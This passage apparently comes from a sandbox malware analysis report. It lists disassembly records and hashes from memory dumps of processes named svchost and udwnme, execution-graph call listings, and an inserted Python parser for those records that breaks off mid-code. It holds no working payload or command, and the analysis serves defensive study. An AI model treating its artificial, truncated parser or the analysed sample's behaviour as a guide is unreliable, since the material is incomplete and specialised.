                                                                    • Source File: 00000007.00000002.2938880079.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76e0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: daaa586bdf1f7943d62a3fabac7f3f0ef8ef0363b9d6536e17a3f2bb51931481
                                                                    • Instruction ID: 4fbb9802b073ad6268e86f7bb3d38b0b60e60c706a66594725a45d263ca93902
                                                                    • Opcode Fuzzy Hash: daaa586bdf1f7943d62a3fabac7f3f0ef8ef0363b9d6536e17a3f2bb51931481
                                                                    • Instruction Fuzzy Hash: 4FB002746054105BC645D654D551454B7519BC5215724C49DA419CB255CF33DD0395C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04c6a2daaf5bdabdff2400713fa9176c42c967c4b4e83053dae65b7ef460bd7f
                                                                    • Instruction ID: 97f0cfddf8d748f21b9eac9a45a5e77c4128d0c7b805e30e389e4671667dd113
                                                                    • Opcode Fuzzy Hash: 04c6a2daaf5bdabdff2400713fa9176c42c967c4b4e83053dae65b7ef460bd7f
                                                                    • Instruction Fuzzy Hash: F3A022B00280088380208800BA0A0303330C20200AB0002CBEC0F00200CA23082002CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0cacf7b7ab6383fe2dd2d2539b58b805ae2d192287dd7cef4c4f4c7ab20c7fbf
                                                                    • Instruction ID: f3f85a03c00ec60e027aeb605f3e7da8d2be69224dcb6492e652be59e4ab4fae
                                                                    • Opcode Fuzzy Hash: 0cacf7b7ab6383fe2dd2d2539b58b805ae2d192287dd7cef4c4f4c7ab20c7fbf
                                                                    • Instruction Fuzzy Hash: 6890023104971C8F86402795FD0D955775EA544515B840051A60D415039A9664108A95
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2937502879.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • API ID:
                                                                    • String ID: Hjq$dLlq
                                                                    • API String ID: 0-3820807802
                                                                    • Opcode ID: 5ce59e38cb766ef65ae5cb548362949820c5b2baf15b8714fd65c110541e0f08
                                                                    • Instruction ID: 52293838e183d1829bc9bf761a6b82839eba297c4d83218393b788cd2d53367d
                                                                    • Opcode Fuzzy Hash: 5ce59e38cb766ef65ae5cb548362949820c5b2baf15b8714fd65c110541e0f08
                                                                    • Instruction Fuzzy Hash: 5A51D231B042058FCB19DF68D858A9EBBF2FF89310F1445AAE405EB3A1CB759D05CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 6b5e40d191810d3f539b96427fbb11427d051aaca9f161ed7f6e8a98340dbd8a
                                                                    • Instruction ID: 4b01c8e2f6116e9bd9cefdbfc2f6f065f1102ed5c5a8187d6ee0f64ee9f04675
                                                                    • Opcode Fuzzy Hash: 6b5e40d191810d3f539b96427fbb11427d051aaca9f161ed7f6e8a98340dbd8a
                                                                    • Instruction Fuzzy Hash: 1A31AE70F102169FCB48EB78C561A6E7BF6BF89210B14406DE545DB3A8DA30CC01C791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: 678fc7ceaeea3bff7e727c429b5d3be813ebc9c856030534d1ffd521917915f1
                                                                    • Instruction ID: 6762391daf2a49877fd899b60706a42369b2780c2d44313f0b752cfdc004e054
                                                                    • Opcode Fuzzy Hash: 678fc7ceaeea3bff7e727c429b5d3be813ebc9c856030534d1ffd521917915f1
                                                                    • Instruction Fuzzy Hash: FE317E75A102059FCB19DF68C988BAEBBF2FF48310F148569E406AB361CB75ED44CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: 76503e243a2374ca4f4a7cc801e6460f4db81e0f4155c8b570750f2b7f71f98e
                                                                    • Instruction ID: eed987563ab9aa47e1b502e9f23069b1ac2c66e8a3deac37286cac44a33ae9a5
                                                                    • Opcode Fuzzy Hash: 76503e243a2374ca4f4a7cc801e6460f4db81e0f4155c8b570750f2b7f71f98e
                                                                    • Instruction Fuzzy Hash: A5012830B043504FC38E9B7C98148AE3FE3AFC622031544BAE109CF3B2CE298D028751
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b5dd41e923d45d03610a15af47556ba7f09e65dbb0748633f610d84642874c96
                                                                    • Instruction ID: b5a73af377cd160ea25330272f3ccd11c65155da1cca0f8b84fbff54b5be847b
                                                                    • Opcode Fuzzy Hash: b5dd41e923d45d03610a15af47556ba7f09e65dbb0748633f610d84642874c96
                                                                    • Instruction Fuzzy Hash: BF51D67A600201CFC79BEBA8E68494977B3FF843097509A68D401DB36CEB759D82DF81
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91ae2629523f895f4f3ffc31b03846109c8b1a052bfc04cb9c38867511c1ba4b
                                                                    • Instruction ID: c7732829a089533335737da47749250a436a0fc8ec7a90c74d46436776542f94
                                                                    • Opcode Fuzzy Hash: 91ae2629523f895f4f3ffc31b03846109c8b1a052bfc04cb9c38867511c1ba4b
                                                                    • Instruction Fuzzy Hash: 64419EB0E10209AFCB44EFF9845466EBBFAFF88310F208569D989D7344DB349D418B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 859a37a8418f95ecea2a21ceb20116ba6a373f80834ca56d9f36a20e8f38603a
                                                                    • Instruction ID: d4855aa23c1224eca0f04112b42266b06affc50432360f59f9ed864e256a01a6
                                                                    • Opcode Fuzzy Hash: 859a37a8418f95ecea2a21ceb20116ba6a373f80834ca56d9f36a20e8f38603a
                                                                    • Instruction Fuzzy Hash: 71212874B101159FE754DB69C994BAEBBF3BF88724F248099E855AB3A5CB719C00CB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 382eb011daf4cfb58fc5b7318f72834a001ba27b1ac820b3263352bb63b8dfaf
                                                                    • Instruction ID: 1d25f0e011b41c49f6e68bcfdd3f980c9cc06f2cbfaea6794ead4a018c593204
                                                                    • Opcode Fuzzy Hash: 382eb011daf4cfb58fc5b7318f72834a001ba27b1ac820b3263352bb63b8dfaf
                                                                    • Instruction Fuzzy Hash: EA215E34A262039FDBA9ABF49E5C67E3BF6BF04725700443DAD4BC5148EB708980CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39f80d2bb804232c7261de66c647893a1fe605402d33ccb8cf880448cf3da621
                                                                    • Instruction ID: fc4cdb4731569cfab002d73f96f3c2dfcb71698109ddd59503526127150d571b
                                                                    • Opcode Fuzzy Hash: 39f80d2bb804232c7261de66c647893a1fe605402d33ccb8cf880448cf3da621
                                                                    • Instruction Fuzzy Hash: C92103B1504200EFDF19DF98E9C0B66BF65FB84324F24C569E9090B696C336E456CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b33e12e74e77305493fdc7c41e19fb80425d3153e7ef0a33af81a654144b4fcd
                                                                    • Instruction ID: 84adf1aafc49adacfba69c661c5a0b468cceec839eb22e51e9da9f0e041d31cf
                                                                    • Opcode Fuzzy Hash: b33e12e74e77305493fdc7c41e19fb80425d3153e7ef0a33af81a654144b4fcd
                                                                    • Instruction Fuzzy Hash: D82106B1504200DFDF19DF98E9C0B26BF75FB84318F64C569E9094A296C336D456CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: df28314fb8f1f20fdf9cbf30f282aaf28a90ab75f9029c8448e4e6a3b092c2bb
                                                                    • Instruction ID: 02554d23cef0caf36a134703f2a1b8679ec2db31c4ce8e53a6846022cbf3ca29
                                                                    • Opcode Fuzzy Hash: df28314fb8f1f20fdf9cbf30f282aaf28a90ab75f9029c8448e4e6a3b092c2bb
                                                                    • Instruction Fuzzy Hash: 5D2130347362038FDBA8ABF5AE5C67E7BF6BF047157004439AE0BC5188EB7089809751
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 95dde45ff7f78f1a41c3bdc64cb7cde0e76bc2fe74e97a4dcd292923c5e08dd3
                                                                    • Instruction ID: 37bd55c92f3d87392d36565972645797051c70b412a35e54421973a63a1a13fc
                                                                    • Opcode Fuzzy Hash: 95dde45ff7f78f1a41c3bdc64cb7cde0e76bc2fe74e97a4dcd292923c5e08dd3
                                                                    • Instruction Fuzzy Hash: D911A071A00201DFCB56EBB8D504AAA7BF6BF883217550579E405CB368DB359D61CB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: c45768c7094d5352564760dd3755687b7c07c3d8ee6b11989f83dcef25a8ad65
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: 8911DF72504240DFDF16CF48D9C0B16BF72FB84324F2481A9D9094B256C33AD45ACBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction ID: 93b1b3a6840a6cb4841fe41c6f7d009709fd63c508c7fd69e040bba26f3f80e9
                                                                    • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                    • Instruction Fuzzy Hash: C811E172404280CFCF16CF54D5C0B56BF72FB84324F24C5A9D8090BA96C33AE45ACBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c8be43971eff14948c737f70b7d7cc81187014b559ca7a3d809d9b1ea2174d0e
                                                                    • Instruction ID: dc16ff978f8d3376d44bca2959342b4b329dbaab311c0fde14d2aec085c554ff
                                                                    • Opcode Fuzzy Hash: c8be43971eff14948c737f70b7d7cc81187014b559ca7a3d809d9b1ea2174d0e
                                                                    • Instruction Fuzzy Hash: E711C071B00205DFCB55EBB9D504A2E7BF6BF8922171004B9D40ACB358EB35DC51CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1805647803.0000000005250000.00000040.00000800.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_5250000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04942c06da1e600648b5f43f1c425839655e8cf3d7bf66d8396b0f88aef020ad
                                                                    • Instruction ID: 4b5f2cdd4b6210bea541e7a6728e7c5895d61b74c692cb0f1ff7aaa54caa4c3a
                                                                    • Opcode Fuzzy Hash: 04942c06da1e600648b5f43f1c425839655e8cf3d7bf66d8396b0f88aef020ad
                                                                    • Instruction Fuzzy Hash: A3E08C353001005F8348966EA88485AB7DBEFC9225314447AE209CB365CD64CC014790
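Each disassembly record above ties one function to the memory dump it was lifted from (Source File, Snapshot File, Offset), a Similarity tuple (API ID, String ID, API String ID) and two content hashes, Opcode ID and Instruction ID; in these records the Opcode Fuzzy Hash repeats the Opcode ID. Two svchost records at offset 011DD000 share an Opcode ID while their Instruction IDs differ, which is what you would expect from two copies of the same instruction sequence with different operands. The Python below is an added example, not code from the report or from Joe Sandbox: it parses three records copied from this page, decodes the dot-separated Source File name, cross-checks it against the Snapshot File name and Offset, and groups records by Opcode ID. The field positions used (process index, stage, base address) are inferred from agreement with the Snapshot File names on this page; reading the fifth field as a Windows PAGE_* protection value is an assumption, and the remaining fields are left undecoded.

```python
import re
from collections import defaultdict

# Constructed sample: three disassembly records copied from this report's listing.
RECORDS_TEXT = """\
Memory Dump Source
• Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
• Instruction ID: 5acd75cf0b44f2238b411c56a043969d4416869a9d83f8313b01e6b81402bf08
• Opcode Fuzzy Hash: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
• Instruction Fuzzy Hash: 6C216D317012158BCB15EF68C558BAE32F6EB89304F600579D40AAB3A9DB799C42CB81
Memory Dump Source
• Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction ID: c45768c7094d5352564760dd3755687b7c07c3d8ee6b11989f83dcef25a8ad65
• Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction Fuzzy Hash: 8911DF72504240DFDF16CF48D9C0B16BF72FB84324F2481A9D9094B256C33AD45ACBA2
Memory Dump Source
• Source File: 00000008.00000002.1803854419.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_11dd000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction ID: 93b1b3a6840a6cb4841fe41c6f7d009709fd63c508c7fd69e040bba26f3f80e9
• Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
• Instruction Fuzzy Hash: C811E172404280CFCF16CF54D5C0B56BF72FB84324F24C5A9D8090BA96C33AE45ACBA1
"""

SOURCE_RE = re.compile(r"^(?P<name>\S+)\.sdmp, Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<pid>\d+)_(?P<stage>\d+)_(?P<base>[0-9a-f]+)_(?P<proc>.+)\.jbxd$")
# Windows PAGE_* protection constants; that the fifth Source File field holds one is an assumption.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

def parse_records(text):
    """Split the listing at 'Memory Dump Source' and collect the '• Key: value' lines of each record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            records.append(current)
        elif current is not None and line.startswith("•"):
            key, _, value = line[1:].partition(":")
            current[key.strip()] = value.strip()
    return records

def decode_record(rec):
    """Decode the Source File name and check it against the Snapshot File name and the Offset."""
    src = SOURCE_RE.match(rec["Source File"])
    snap = SNAPSHOT_RE.match(rec["Snapshot File"])
    if not src or not snap:
        raise ValueError("unrecognised record: %r" % rec)
    f = src.group("name").split(".")
    # Field positions inferred from this page: 0 = process index, 1 = stage, 3 = base address (hex);
    # field 4 is taken to be the page protection; fields 2, 5, 6 and 7 are left undecoded.
    info = {
        "process_index": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
        "protect": PAGE_PROTECT.get(int(f[4], 16) & 0xFF, "unknown"),
        "based_on_pe": src.group("pe") == "true", "process": snap.group("proc"),
        "api": rec.get("API ID", ""), "opcode_id": rec["Opcode ID"],
        "instruction_id": rec["Instruction ID"],
    }
    info["consistent"] = (int(snap.group("pid")) == info["process_index"]
                          and int(snap.group("stage")) == info["stage"]
                          and int(snap.group("base"), 16) == info["base"]
                          and int(src.group("offset"), 16) == info["base"])
    return info

def opcode_twins(infos):
    """Opcode IDs shared by records whose Instruction IDs differ: same mnemonics, different operands."""
    groups = defaultdict(list)
    for info in infos:
        groups[info["opcode_id"]].append(info)
    return {oid: g for oid, g in groups.items()
            if len(g) > 1 and len({i["instruction_id"] for i in g}) > 1}

if __name__ == "__main__":
    infos = [decode_record(r) for r in parse_records(RECORDS_TEXT)]
    for i in infos:
        print(i["process"], i["process_index"], hex(i["base"]), i["protect"], i["api"] or "-", i["consistent"])
    print("opcode twins:", {oid[:12]: len(g) for oid, g in opcode_twins(infos).items()})
```

The consistency flag is the cheap sanity check to run before trusting any cross-record comparison: a record whose Snapshot File disagrees with its Source File would mean the listing was assembled from the wrong dump. Grouping by Opcode ID across different snapshot files is the same idea extended to similarity hunting across processes.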

                                                                    Execution Graph

                                                                     Execution Coverage: 17.8%
                                                                     Dynamic/Decrypted Code Coverage: 100%
                                                                     Signature Coverage: 3.4%
                                                                     Total number of Nodes: 87
                                                                     Total number of Limit Nodes: 0
                                                                    execution_graph 23995 5400b20 23996 5400b42 LdrInitializeThunk 23995->23996 23998 5400b7c 23996->23998 23999 5405320 24000 5405366 KiUserCallbackDispatcher 23999->24000 24002 54053b9 24000->24002 23899 1470888 23900 14708a3 23899->23900 23904 14775e6 23900->23904 23918 1477588 23900->23918 23901 1470902 23905 14775f1 23904->23905 23914 1477602 23905->23914 23932 1477ee6 23905->23932 23937 1477e38 23905->23937 23942 1477ebf 23905->23942 23947 1477f70 23905->23947 23952 1477f53 23905->23952 23957 1477e68 23905->23957 23962 1477e29 23905->23962 23967 1477f20 23905->23967 23972 1477ea2 23905->23972 23977 1477f03 23905->23977 23982 1477e85 23905->23982 23914->23901 23919 14775b7 23918->23919 23920 1477602 23919->23920 23921 1477ee6 2 API calls 23919->23921 23922 1477e85 2 API calls 23919->23922 23923 1477f03 2 API calls 23919->23923 23924 1477ea2 2 API calls 23919->23924 23925 1477f20 2 API calls 23919->23925 23926 1477e29 2 API calls 23919->23926 23927 1477e68 2 API calls 23919->23927 23928 1477f53 2 API calls 23919->23928 23929 1477f70 2 API calls 23919->23929 23930 1477ebf 2 API calls 23919->23930 23931 1477e38 2 API calls 23919->23931 23920->23901 23921->23920 23922->23920 23923->23920 23924->23920 23925->23920 23926->23920 23927->23920 23928->23920 23929->23920 23930->23920 23931->23920 23933 1477eeb 23932->23933 23934 1477f8b 23933->23934 23987 5400a7c 23933->23987 23991 5400a6a 23933->23991 23934->23914 23938 1477e5e 23937->23938 23939 1477f8b 23938->23939 23940 5400a6a KiUserExceptionDispatcher 23938->23940 23941 5400a7c KiUserExceptionDispatcher 23938->23941 23939->23914 23940->23939 23941->23939 23943 1477ec4 23942->23943 23944 1477f8b 23943->23944 23945 5400a6a KiUserExceptionDispatcher 23943->23945 23946 5400a7c KiUserExceptionDispatcher 23943->23946 23944->23914 23945->23944 23946->23944 23948 1477f75 23947->23948 23949 1477f8b 23948->23949 23950 5400a6a KiUserExceptionDispatcher 
23948->23950 23951 5400a7c KiUserExceptionDispatcher 23948->23951 23949->23914 23950->23949 23951->23949 23953 1477f58 23952->23953 23954 1477f8b 23953->23954 23955 5400a6a KiUserExceptionDispatcher 23953->23955 23956 5400a7c KiUserExceptionDispatcher 23953->23956 23954->23914 23955->23954 23956->23954 23958 1477e6d 23957->23958 23959 1477f8b 23958->23959 23960 5400a6a KiUserExceptionDispatcher 23958->23960 23961 5400a7c KiUserExceptionDispatcher 23958->23961 23959->23914 23960->23959 23961->23959 23963 1477e5e 23962->23963 23964 1477f8b 23963->23964 23965 5400a6a KiUserExceptionDispatcher 23963->23965 23966 5400a7c KiUserExceptionDispatcher 23963->23966 23964->23914 23965->23964 23966->23964 23968 1477f25 23967->23968 23969 1477f8b 23968->23969 23970 5400a6a KiUserExceptionDispatcher 23968->23970 23971 5400a7c KiUserExceptionDispatcher 23968->23971 23969->23914 23970->23969 23971->23969 23973 1477ea7 23972->23973 23974 1477f8b 23973->23974 23975 5400a6a KiUserExceptionDispatcher 23973->23975 23976 5400a7c KiUserExceptionDispatcher 23973->23976 23974->23914 23975->23974 23976->23974 23978 1477f08 23977->23978 23979 1477f8b 23978->23979 23980 5400a6a KiUserExceptionDispatcher 23978->23980 23981 5400a7c KiUserExceptionDispatcher 23978->23981 23979->23914 23980->23979 23981->23979 23983 1477e8a 23982->23983 23984 1477f8b 23983->23984 23985 5400a6a KiUserExceptionDispatcher 23983->23985 23986 5400a7c KiUserExceptionDispatcher 23983->23986 23984->23914 23985->23984 23986->23984 23988 5400a7d 23987->23988 23989 5400a82 KiUserExceptionDispatcher 23988->23989 23990 5400a95 23988->23990 23989->23988 23990->23934 23992 5400a7d 23991->23992 23993 5400a95 23992->23993 23994 5400a82 KiUserExceptionDispatcher 23992->23994 23993->23934 23994->23992

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 851 5400b20-5400b75 LdrInitializeThunk 855 5400b7c-5400b83 851->855 856 5400b85-5400bb9 855->856 857 5400bcb-5400be4 855->857 856->857 866 5400bbb-5400bc5 856->866 859 5400be6 857->859 860 5400bef 857->860 859->860 862 5400bf0 860->862 862->862 866->857
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.2931798292.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_15_2_5400000_udwnme.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
                                                                    • Instruction ID: 5acd75cf0b44f2238b411c56a043969d4416869a9d83f8313b01e6b81402bf08
                                                                    • Opcode Fuzzy Hash: 0f9fda9bd14b5917d844e6025537f990a4612ada4a351860d5a07807d79c603b
                                                                    • Instruction Fuzzy Hash: 6C216D317012158BCB15EF68C558BAE32F6EB89304F600579D40AAB3A9DB799C42CB81
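Both graph listings above use the same flattened token format: a node is `id address [label]` (in the control_flow_graph the address is a `start-end` basic-block range), an edge is `a->b`, and a label is either an API name such as KiUserExceptionDispatcher or a `N API calls` summary for a callee the listing does not expand at that point. The Python below is an added example, not code from the report or from Joe Sandbox, that parses that format into nodes and edges, finds the entry nodes (in-degree 0), reports which APIs each entry reaches and how many call sites there are, and flags the edges that close cycles (23989->23988, 23994->23992 and the self loop 862->862 in the listings above). It handles both listings with one parser. The rule that a node id is an all-digit token immediately followed by an address-looking token is an assumption made so that the 2 in `2 API calls` stays a label word; the embedded execution_graph sample is an excerpt of the listing above, not the complete graph.

```python
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]{5,}(?:-[0-9a-fA-F]{5,})?$")  # address or start-end range
# Constructed sample: an excerpt of the execution_graph listing above (not the whole graph).
EXECUTION_GRAPH_EXCERPT = (
    "23995 5400b20 23996 5400b42 LdrInitializeThunk 23995->23996 23998 5400b7c 23996->23998 "
    "23999 5405320 24000 5405366 KiUserCallbackDispatcher 23999->24000 24002 54053b9 24000->24002 "
    "23899 1470888 23900 14708a3 23899->23900 23904 14775e6 23900->23904 23918 1477588 23900->23918 "
    "23901 1470902 23905 14775f1 23904->23905 23914 1477602 23905->23914 23932 1477ee6 23905->23932 "
    "23914->23901 23919 14775b7 23918->23919 23920 1477602 23919->23920 "
    "23921 1477ee6 2 API calls 23919->23921 23920->23901 23921->23920 "
    "23933 1477eeb 23932->23933 23934 1477f8b 23933->23934 23987 5400a7c 23933->23987 "
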